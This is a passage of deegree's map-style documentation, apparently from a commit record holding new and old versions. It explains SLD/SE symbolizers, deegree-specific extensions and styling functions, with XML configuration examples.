of TTF files as Mark symbols\n\nYou can use TrueType font files to use custom vector symbols in a\n_Mark_ element:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xlink:href=\"filepath\/yousans.ttf\" \/>\n <Format>ttf<\/Format>\n <MarkIndex>99<\/MarkIndex>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n ...\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\nTo find out what index you need to access, have a look at this\nhttp:\/\/osgeo-org.1560.n6.nabble.com\/SE-Styling-MarkIndex-glyph-index-tt5022210.html#a5026571[post]\non the mailinglist which explains it very well.\n\n===== Label AutoPlacement\n\ndeegree has an option for SE LabelPlacement to automatically place\nlabels on the map. To enable AutoPlacement, you can simply set the\n\"auto\" attribute to \"true\".\n\n[source,xml]\n----\n<LabelPlacement>\n <PointPlacement auto=\"true\">\n <Displacement>\n <DisplacementX>0<\/DisplacementX>\n <DisplacementY>0<\/DisplacementY>\n <\/Displacement>\n <Rotation>0<\/Rotation>\n <\/PointPlacement>\n<\/LabelPlacement> \n----\n\nTIP: AutoPlacement for labels only works for PointPlacement. AutoPlacement\nfor LinePlacement is not implemented yet.\n\n===== LinePlacement extensions\n\nThere are additional deegree specific LinePlacement parameters available\nto enable more sophisticated text rendering along lines:\n\n[width=\"100%\",cols=\"23%,11%,8%,58%\",options=\"header\",]\n|===\n|Option |Value |Default |Description\n|PreventUpsideDown |Boolean |false |Avoids upside down placement of text\n\n|Center |Boolean |false |Places the text in the center of the line\n\n|WordWise |Boolean |true |Tries to place individual words instead of\nindividual characters\n|===\n\n[source,xml]\n----\n<LinePlacement>\n <IsRepeated>false<\/IsRepeated>\n <InitialGap>10<\/InitialGap>\n <PreventUpsideDown>true<\/PreventUpsideDown>\n <Center>true<\/Center>\n <WordWise>false<\/WordWise>\n<\/LinePlacement>\n----\n\n===== ExternalGraphic extensions\n\ndeegree extends the OnlineResource element of ExternalGraphics to\nsupport ogc:Expressions as child elements. Example:\n\n[source,xml]\n----\n<ExternalGraphic>\n <OnlineResource>\n <ogc:PropertyName>app:icon<\/ogc:PropertyName>\n <\/OnlineResource>\n <Format>image\/svg<\/Format>\n<\/ExternalGraphic> \n----\n\n===== GraphicStroke extensions\n\nBy default, a _GraphicStroke_ is drawn repeatedly, but it can also be\nonly drawn once if the parameter `deegree-graphicstroke-position-percentage`\nis defined as a percentage of the line length.\nThe parameter `deegree-graphicstroke-rotation` controls whether the\n_Graphic_ is rotated to follow the angle of the current line segment\nor not, values larger than zero enables this. If not specified the\n_Graphic_ will follow the angle of the line.\n\n*Rendering of Mark along a geometry*\n\nWhen deegree renders strokes with _Mark_ it will use the _Fill_ and\n_Stroke_ which are defined as sub elements of _Mark_ instead of the\nparameter for `color`, `line-width` and `opacity` of _Stroke_.\nFor _Mark_ whose _Fill_ or _Stroke_ should be omitted, this can be\nrealized by setting `...-opacity` to zero. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill-opacity\">0<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n <SvgParameter name=\"deegree-graphicstroke-rotation\">0<\/SvgParameter>\n<\/Stroke>\n----\n\nNOTE: A typical usage is to draw an arrowhead on a line. This can be\nachieved by using a filled `triangle` _Mark_ which is rotated 90 degrees\nto the left (`-90`) with an anchor point of `0.75` \/ `0.5` and\n`deegree-graphicstroke-position-percentage` of `0` for the beginning\nof a line. To draw it at the end of a line, the _Mark_ has to be rotated\n90 degrees to the right (`90`) with an anchor point of `0.25` \/ `0.5`\nand `deegree-graphicstroke-position-percentage` of `100`.\n\n*Rendering of images or SVGs along a geometry*\n\nBoth images and SVG can be drawn along a geometry, but it should be\nnoted that these are best suited for signatures that are drawn only\nonce or with some gap.\nExample of a single SVG at the middle of the line:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <ExternalGraphic>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <\/ExternalGraphic>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n<\/Stroke>\n----\n\n*Rendering of SVGs as Mark*\n\nTo draw only the outline or fill of an SVG with a single color, an SVG\ncan be used as a `Mark`. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0.0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n<\/Stroke>\n----\n\nNOTE: Previous versions would have rendered SVG defined in an\n`Graphic`\/`ExternalGraphic`\/`OnlineResource` like the `Mark` example above.\nThese have either their configuration converted to\n`Graphic`\/`Mark`\/`OnlineResource` or the option to not render SVGs like\nimages has to be set for the instance, see <<anchor-appendix>> for details.\n\n==== SE & FE Functions\n\nThere are a couple of deegree specific functions which can be expressed\nas standard OGC function expressions in SLD\/SE. Additionally deegree has\nsupport for all the unctions defined within the SE standard.\n\n===== FormatNumber\n\nThis function is needed to format number attributes. It can be used like\nin the following example:\n\n[source,xml]\n----\n<FormatNumber xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <NumericValue>\n <ogc:PropertyName>app:SHAPE_LEN<\/ogc:PropertyName>\n <\/NumericValue>\n <Pattern>############.00<\/Pattern>\n<\/FormatNumber>\n----\n\n===== FormatDate\n\nThis function is fully supported, although not fully tested with all\navailable schema types mentioned in the spec.\n\n[source,xml]\n----\n<FormatDate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <DateValue>\n <ogc:PropertyName>app:TIMESTAMP<\/ogc:PropertyName>\n <\/DateValue>\n <Pattern>DD<\/Pattern>\n<\/FormatDate>\n----\n\n===== ChangeCase\n\nThis function is used to change the case of property values.\n\n[source,xml]\n----\n<ChangeCase xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" direction=\"toUpper\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/ChangeCase>\n----\n\n===== Concatenate\n\nWith the concatenate function it is possible to merge the values of more\nthan one property to a chain.\n\n[source,xml]\n----\n<Concatenate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text1<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text2<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text3<\/ogc:PropertyName>\n <\/StringValue>\n<\/Concatenate>\n----\n\n===== Trim\n\nThe trim function is used to trim string property values.\n\n[source,xml]\n----\n<Trim xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" stripOffPosition=\"both\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/Trim>\n----\n\n===== StringLength\n\nWith the StringLength function it is possible to calculate the length of\nstring property values.\n\n[source,xml]\n----\n<StringLength xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringLength>\n----\n\n===== Substring\n\nWith the substring function it is possible to only get a specific\nsubstring of a string property.\n\n[source,xml]\n----\n<Substring xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <Position>1<\/Position>\n <Length>\n <ogc:Sub>\n <StringPosition fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <\/StringPosition>\n <ogc:Literal>1<\/ogc:Literal>\n <\/ogc:Sub>\n <\/Length>\n<\/Substring>\n----\n\n===== StringPosition\n\nThe StringPosition function is made to get the literal at a specific\nposition from a string property.\n\n[source,xml]\n----\n<StringPosition xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\">app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringPosition>\n----\n\n===== Categorize, Interpolate, Recode\n\nThese functions can operate both on alphanumeric properties of features\nand on raster data. For color values we extended the syntax a bit to\nallow for an alpha channel: #99ff0000 is a red value with an alpha value\nof 0x99. This allows the user to create eg. an interpolation from\ncompletely transparent to a completely opaque color value. To work on\nraster data you'll have to replace the PropertyName values with\nRasterdata.\n\nFor Interpolate only linear interpolation is currently supported.\n\n[source,xml]\n----\n<Categorize xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" fallbackValue=\"#fefdC3\">\n <LookupValue>\n <ogc:PropertyName>app:POP2000<\/ogc:PropertyName>\n <\/LookupValue>\n <Value>#FFE9D8<\/Value>\n <Threshold>1000<\/Threshold>\n <Value>#FBCFAC<\/Value>\n <Threshold>10000<\/Threshold>\n <Value>#FAAC6F<\/Value>\n <Threshold>25000<\/Threshold>\n <Value>#FD913D<\/Value>\n <Threshold>100000<\/Threshold>\n <Value>#FF7000<\/Value>\n<\/Categorize>\n----\n\n[source,xml]\n----\n<Interpolate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"#005C29\" method=\"color\">\n <LookupValue>\n <ogc:PropertyName>app:CODE<\/ogc:PropertyName>\n <\/LookupValue>\n <InterpolationPoint>\n <Data>-1<\/Data>\n <Value>#005C29<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>100<\/Data>\n <Value>#067A3A<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>300<\/Data>\n <Value>#03A64C<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>500<\/Data>\n <Value>#00CF5D<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>1000<\/Data>\n <Value>#ffffff<\/Value>\n <\/InterpolationPoint>\n<\/Interpolate>\n----\n\n[source,xml]\n----\n<Recode xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <LookupValue>\n<ogc:PropertyName>app:code<\/ogc:PropertyName>\n <\/LookupValue>\n <MapItem>\n <Data>1000<\/Data>\n <Value>water<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>2000<\/Data>\n <Value>nuclear<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>3000<\/Data>\n <Value>solar<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>4000<\/Data>\n <Value>wind<\/Value>\n <\/MapItem>\n<\/Recode>\n----\n\n===== General XPath functions\n\nMany useful things can be done by simply using standard XPath 1.0\nfunctions in PropertyName elements.\n\nAccess the (local) name of an element (e.g. the name of a referenced\nfeature \/ subfeature).\n\n[source,xml]\n----\n<PropertyName xmlns:app=\"http:\/\/www.deegree.org\/app\">app:subfeature\/*\/local-name()<\/PropertyName>\n----\n","old_contents":"[[anchor-configuration-renderstyles]]\n== Map styles\n\nStyle resources are used to obtain information on how to render geo\nobjects (mostly features, but also coverages) into maps. The most common\nuse case is to reference them from a layer configuration, in order to\ndescribe how the layer is to be rendered. This chapter assumes the\nreader is familiar with basic SLD\/SE terms. The style configurations do\nnot depend on any other resource.\n\nIn contrast to other deegree configurations the style configurations do\nnot have a custom format. You can use standard SLD or SE documents\n(1.0.0 and 1.1.0 are supported), with a couple of deegree specific\nextensions, which are described below. Please refer to the\nhttp:\/\/www.opengeospatial.org\/standards\/sld[SLD] and\nhttp:\/\/www.opengeospatial.org\/standards\/se[SE] specifications for\nreference. Additionally this page contains specific examples below.\n\nIn deegree terms, each SLD or SE file will create a _style store_. In\ncase of an SE file (usually beginning at the FeatureTypeStyle or\nCoverageStyle level) the style store only contains one style, in case of\nan SLD file the style store may contain multiple styles, each identified\nby the layer (only NamedLayers make sense here) and the name of the\nstyle (only UserStyles make sense) when referenced later.\n\n.Style resources define how geo objects are rendered\nimage::workspace-overview-style.png[Style resources define how geo objects are rendered,scaledwidth=80.0%]\n\nTIP: When defining styles, take note of the log file. Upon startup the log\nwill warn you about potential problems or errors during parsing, and\nupon rendering warnings will be emitted when rendering is unsuccessful\neg. because you had a typo in a geometry property name. When you're\nseeing an empty map when expecting a fancy one, check the log before\nreporting a bug. deegree will tolerate a lot of syntactical errors in\nyour style files, but you're more likely to get a good result when your\nfiles validate and you have no warnings in the log.\n\n=== Overview\n\nFrom the point of view of the Symbology Encoding Standard, there are 5\nkinds of symbolizations, which can be present in a map image:\n\n * *Point symbolizations*\n * *Line symbolizations*\n * *Polygon symbolizations*\n * *Text symbolizations*\n * *Raster symbolizations*\n\nThe first 4 symbolizations usually represent vector feature objects.\nRaster symbolization is used to visualize raster data. This\ndocumentation chapter describes, how those symbolizations can be\nrealized using OGC symbology encoding. It will lead from the underlying\nbasics to some more complex constructions for map visulization.\n\n=== Basics\n\n==== General Layout\n\nThe general structure of an SE-Style contains:\n\n[source,xml]\n----\n<FeatureTypeStyle>\n<FeatureTypeName> \n<Rule> \n----\n\nIt is constructed like this:\n\n[source,xml]\n----\n<FeatureTypeStyle xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:sed=\"http:\/\/www.deegree.org\/se\" xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\" xmlns:plan=\"http:\/\/www.deegree.org\/plan\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <FeatureTypeName>plan:yourFeatureType<\/FeatureTypeName>\n <Rule>\n ...\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\nTIP: Before you start, always remember that every style is read top-down. So\nbe aware the second <Rule> will overpaint the first one, the third\noverpaints the second and so on\n\n==== Symbolization Rules\n\nEvery specific map visualization needs its own symbolization rule. Rules\nare defined within the *<Rule>* element. Each rule can consist of at\nleast one symbolizer. Every rule has its own name and description\nelements. The description elements are used to create the legend caption\nfrom it.\n\nDepending on the type of symbolization to create, one of the following\nsymbolizers can be used:\n\n* <PointSymbolizer>\n* <LineSymbolizer>\n* <PolygonSymbolizer>\n* <TextSymbolizer>\n* <RasterSymbolizer>\n\nSymbolizers can have an uom-attribute (units of measure), which\ndetermines the unit of all values set inside the Symbolizer. The\nfollowing values for UoM are supported within deegree:\n\n* uom=\"pixel\"\n* uom=\"meter\"\n* uom=\"mm\"\n\nThe default value is \"pixel\".\n\nWithin every symbolizer (except rastersymbolizers), a geometry property\nused for the rendering, can be specified with the *<Geometry>* element.\nIf there is no geometry specified the first geometry property of the\nFeatureType will be used.\n\nEach of the (Vector-)Symbolizer-elements has its dimensions, which are\ndescribed in more detail below:\n\n\n* *<LineSymbolizer>* has only one dimension: the <Stroke>-element (to\nstyle the stroke).\n* *<PolygonSymbolizer>* has two dimensions: the <Stroke> (to sytle the\nstroke of the polygon) and the <Fill>-element (to style the inside of\nthe polygon).\n* *<PointSymbolizer>* can also contain both dimensions: the <Stroke> (to\nstyle the stroke of the point) and the <Fill>-element (to style the\ninside of the point).\n* *<TextSymbolizer>* has three dimensions: the <Label> (to set the\nproperty, which is to be styled), the <Font> (to style the font) and the\n<Fill>-element (to style the inside of the font).\n\n\n===== Stroke\n\nTo describe a <Stroke>, a number of different <SvgParameter> can be\nused.\n\n* `name=\"stroke\"` => The stroke (color) is defined by the hex color code\n(e.g. black ==> #000000).\n* `name=\"opacity\"` => Opacity can be set by a percentage number, written\nas decimal (e.g. 0,25 => 25% opacity).\n* `name=\"with\"` => Wide or thin, set your stroke-width however you want.\n* `name=\"linecap\"` => For linecap (ending) a stroke you can choose the\nfollowing types: round, edged, square, butt.\n* `name=\"linejoin\"` => Also there are different types of linejoin\npossibilities: round, mitre, bevel.\n* `name=\"dasharray\"` => The dasharray defines where the stroke is painted\nand where not (e.g. \"1 1\" => - - - ).\n\n\n[source,xml]\n----\n<LineSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>layer:position<\/ogc:PropertyName>\n <\/Geometry>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">0.5<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-linejoin\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-dasharray\">1 1<\/SvgParameter>\n <\/Stroke>\n<\/LineSymbolizer>\n----\n\n===== Fill\n\nFor the visualization of polygons, points and texts, the <Fill> element\ncan be used additional to styling the <Stroke>. You can set the\nfollowing <SvgParameter>:\n\n* name=\"fill\" (color)\n* name=\"fill-opacity\"\n\nThese two <SvgParameter> are working like those from <Stroke>.\n\n[source,xml]\n----\n<PolygonSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.5<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <...>\n <\/Stroke>\n<\/PolygonSymbolizer>\n----\n\n===== Font\n\nFor the creation of a <TextSymbolizer>, certain parameters for the\ndisplayed text have to be set. Every <TextSymbolizer> needs a <Label> to\nbe specified. The <Font> to be used for the text symbolization can be\nset with <SvgParameter> elements. These are the possible <SvgParameter>:\n\n* `name=\"font-family\"` => Possible types are: e.g. Arial, Times Roman,\nSans-Serif\n* `name=\"font-weight\"` => Possible types are: normal, bold, bolder,\nlighter\n* `name=\"font-size\"` => Possible values are integer values\n\n\nWith a <Fill>-element a color and opacity of the font can be defined.\nThis method is used to show text which is stored in your database.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Label>\n <ogc:PropertyName>layer:displayedProperty<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">3<\/SvgParameter>\n <\/Font>\n <Fill>\n <...>\n <\/Fill>\n<\/TextSymbolizer>\n----\n\n==== Advanced symbolization\n\nThere are numerous possibilities for advanced symbolization. This\nchapter describes the basic components of advanced map stylings using\nsymbology encoding.\n\n===== Using Graphics\n\nThere are different ways to use graphical symbols as a base for map\nsymbolizations. <Mark> elements can be used to specify well known\ngraphics, <ExternalGraphic> elements can be used to have external\ngraphic files as a base for a symbolization rule.\n\n*Mark*\n\nWith Marks it is possible to use wellkown objects for symboliation as\nwell as user-generated content like SVGs. It is possible to use all of\nthese for <PointSymbolizer>, <LineSymbolizer> and <PolygonSymbolizer>.\n\nFor a <PointSymbolizer> the use of a Mark looks like the following:\n\n[source,xml]\n----\n<PointSymbolizer uom=\"meter\">\n <Geometry>\n ...\n <\/Geometry>\n <Graphic>\n <Mark>\n ...\n----\n\nFor <LineSymbolizer> and <PolygonSymbolizer> it works like this:\n\n[source,xml]\n----\n<Geometry>\n ...\n<\/Geometry>\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n ...\n----\n\nThe following wellknown objects can be used within Marks:::\n * circle\n * triangle\n * star\n * square\n * x ==> creates a cross\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n ...\n <\/Fill>\n<\/Mark>\n----\n\nIncluding an SVG graphic within a mark might look like this:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" xlink:type=\"simple\"\n xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n ...\n <\/Fill>\n <Stroke>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\n*ExternalGraphic*\n\n<ExternalGraphic>-elements can be used to embed graphics, taken from a\ngraphic-file (e.g. SVGs or PNGs). The <OnlineResource> sub-element gives\nthe URL of the graphic-file.\n\nTIP: Make sure you don't forget the MIME-type in the <Format>-sub-element\n(e.g. \"image\/svg\" or \"image\/png\").\n\n[source,xml]\n----\n<Graphic>\n <ExternalGraphic>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\"\n xlink:type=\"simple\" xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>image\/svg<\/Format>\n <\/ExternalGraphic>\n <Size>10<\/Size>\n ...\n<\/Graphic>\n----\n\n===== Size\n\nOf course everything has its own <Size>. The size is defined directly\nafter <Mark> or <ExternalGraphic>.\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n<\/Mark>\n<Size>3<\/Size>\n----\n\n===== Gap\n\nIt is possible to define Gaps for graphics within <LineSymbolizer> or\n<PolygonSymbolizer>. For this the <Gap>-element can be used like this:\n\n[source,xml]\n----\n<GraphicStroke>\n <Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <\/Graphic>\n <Gap>20<\/Gap>\n<\/GraphicStroke>l\n----\n\n===== Rotation\n\nSymbology Encoding enables the possibility to rotate every graphic\naround its center with the <Rotation>-element. This goes from zero to\n360 degrees. The rotation is clockwise unless it's negative, then it's\ncounter-clockwise.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n <Size>3<\/Size>\n <Rotation>180<\/Rotation>\n<\/Graphic>\n----\n\n===== Displacement\n\nThe <Displacement>-element allows to paint a graphic displaced from his\ngiven position. Negative and positive values are possible. THe\ndisplacement must be set via the X and Y displacement elements.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <Displacement>\n <DisplacementX>5<\/DisplacementX>\n <DisplacementY>5<\/DisplacementY>\n <\/Displacement>\n<\/Graphic>\n----\n\n===== Halo\n\nA nice possibility to highlight your font, is the <Halo>-element. The\n<Radius>-sub-element defines the size of the border.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>xplan:position<\/ogc:PropertyName>\n <\/Geometry>\n <Label>\n ...\n <\/Label>\n <Font>\n ...\n <\/Font>\n <LabelPlacement>\n ...\n <\/LabelPlacement>\n <Halo>\n <Radius>1.0<\/Radius>\n <Fill>\n ...\n <\/Fill>\n <\/Halo>\n ...\n<\/TextSymbolizer>\n----\n\n=== Using Filters\n\nWithin symbolization rules, it is possible to use Filter Encoding\nexpressions. How construct those expressions is explained within the\n<<anchor-configuration-filter>> chapter\n\n=== Basic Examples\n\n==== Point Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Weatherstations<\/Name>\n <Rule>\n <Name>Weatherstations<\/Name>\n <Description>\n <Title>Weatherstations in Utah<\/Title>\n <\/Description>\n <ogc:Filter>\n <ogc:PropertyIsEqualTo>\n <ogc:PropertyName>SomeProperty<\/ogc:PropertyName>\n <ogc:Literal>100<\/ogc:Literal>\n <\/ogc:PropertyIsEqualTo>\n <\/ogc:Filter>\n <PointSymbolizer>\n <Graphic>\n <Mark>\n <WellKnownName>square<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>13<\/Size>\n <\/Graphic>\n <\/PointSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Line Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Railroads<\/Name>\n <Rule>\n <Name>Railroads<\/Name>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#ffffff<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1.5<\/SvgParameter>\n <\/Stroke>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>-1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Polygon Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>LandslideAreas<\/Name>\n <Rule>\n <Name>LandslideAreas<\/Name>\n <Description>\n <Title>LandslideAreas<\/Title>\n <\/Description>\n <PolygonSymbolizer>\n <Fill>\n <SvgParameter name=\"fill\">#cc3300<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.3<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/PolygonSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n==== Text Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n 